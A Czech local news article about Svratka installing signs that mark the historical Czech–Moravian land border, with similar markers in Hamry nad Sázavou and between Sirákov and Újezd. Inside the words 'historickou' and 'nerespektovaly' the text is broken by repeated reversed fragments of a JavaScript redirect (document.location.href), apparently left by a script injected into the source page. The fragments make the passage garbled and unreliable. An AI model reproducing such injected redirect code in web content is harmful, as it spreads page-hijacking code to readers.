Rainbow page separator

Svratka se připojila k obcím připomínajícím si zemskou hranici

Neděle, 21. listopadu 2021

Svratka / Vítá vás Markrabství moravské s moravskou orlicí a Vítá vás Království české s tradičním lvem. To jsou nové značky, kterými také ve Svratce symbolicky označili his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torickou hranici Čech a Moravy, která městem procházela. Tu v minulosti, stejně jako v okolních obcích, jako jsou třeba Křižánky, Herálec nebo Jimramov, tvořila řeka Svratka. Cílem umístění informační tabule se stalo zejména navrácení povědomí veřejnosti o moravsko–české zemské hranici. Ta platila přes sedm set let, v podstatě až do roku 1949, kdy bylo v Československé socialistické republice zavedeno jiné územní členění. Nově vzniklé kraje už nerespek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaly do té doby platící zemské uspořádání.
Informační značku stejného typu mají rovněž v Hamrech nad Sázavou, konkrétně v západní části osady Šlakhamry na místě zvaném Na konci světa. Tam se již řadu desetiletí nachází i stylizovaná strážní budka s figurínou celníka a stejná tabule i podobná „celnice“ jsou od roku 2013 i při silnici mezi Sirákovem a Újezdem.